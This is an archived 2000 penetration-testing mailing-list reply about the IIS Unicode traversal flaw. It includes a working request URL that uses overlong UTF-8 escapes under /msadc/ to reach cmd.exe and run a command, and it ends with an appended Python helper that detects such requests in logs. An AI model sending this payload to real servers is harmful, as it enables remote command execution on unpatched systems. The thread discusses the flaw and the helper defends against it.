Penetration Testing mailing list archives

Re: [PEN-TEST] IIS UNICODE Strings


From: Michael Owen <mowen () COSTCO COM>
Date: Mon, 30 Oct 2000 11:22:47 -0800

In our test, the InetPub directory is in logical drive D: instead of default
C:.
Does that matter in the above examples?
-------------------------------------


In our internal tests, it does, and the exploit won't work. BUT, if you use
the /msadc/ virtual folder, it won't matter, as msadc is in c:\program
files\Common\....


http://iisbox/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt
/system32/cmd.exe\?/c\+dir+c:\\temp






----------------------------------
Michael Owen
Costco Wholesale
Network Security
(425) 313-2957
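
An added example, not part of the original post: a log-review helper that detects the overlong UTF-8 encoding used in the request above (`%e0%80%af` is a three-byte encoding of `/`) and shows how a path looks to a decoder that accepts it. It generalizes to two- and four-byte overlong forms; the function names and sample URIs are constructed for illustration.

```python
import re

PCT = re.compile(rb"%([0-9A-Fa-f]{2})")
MIN_CP = {2: 0x80, 3: 0x800, 4: 0x10000}  # smallest code point that needs n bytes

def pct_decode(raw: bytes) -> bytes:
    """Percent-decode once; malformed escapes are left untouched."""
    return PCT.sub(lambda m: bytes([int(m.group(1), 16)]), raw)

def overlong_sequences(data: bytes):
    """Return [(offset, raw_bytes, char)] for every overlong UTF-8 sequence."""
    found, i = [], 0
    while i < len(data):
        b = data[i]
        n = 2 if 0xC0 <= b <= 0xDF else 3 if 0xE0 <= b <= 0xEF else 4 if 0xF0 <= b <= 0xF7 else 0
        tail = data[i + 1:i + n]
        if n == 0 or len(tail) != n - 1 or any(t & 0xC0 != 0x80 for t in tail):
            i += 1
            continue
        cp = b & (0xFF >> (n + 1))          # payload bits of the lead byte
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)     # six payload bits per continuation byte
        if cp < MIN_CP[n]:                  # fits in fewer bytes, so overlong
            found.append((i, data[i:i + n], chr(cp)))
        i += n
    return found

def lenient_view(data: bytes) -> str:
    """Path as a decoder that accepts overlong forms would see it."""
    out, pos = [], 0
    for off, raw, ch in overlong_sequences(data):
        out.append(data[pos:off].decode("latin-1") + ch)
        pos = off + len(raw)
    return "".join(out) + data[pos:].decode("latin-1")

def check_uri(uri: str) -> dict:
    """Classify one logged request URI."""
    path = pct_decode(uri.split("?", 1)[0].encode("latin-1", "replace"))
    seen = lenient_view(path).replace("\\", "/")
    return {
        "overlong": [raw.hex() for _, raw, _ in overlong_sequences(path)],
        "traversal": ".." in seen.split("/"),
    }

# Constructed sample request URIs (not real log data).
SAMPLES = ["/msadc/..%e0%80%af../", "/images/caf%c3%a9.gif", "/index.html"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(s, check_uri(s))
```

A traversal check that runs before this normalization sees the segment `..` followed by three high bytes and `..`, not two `..` segments, which is why the filter has to operate on the leniently decoded path.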

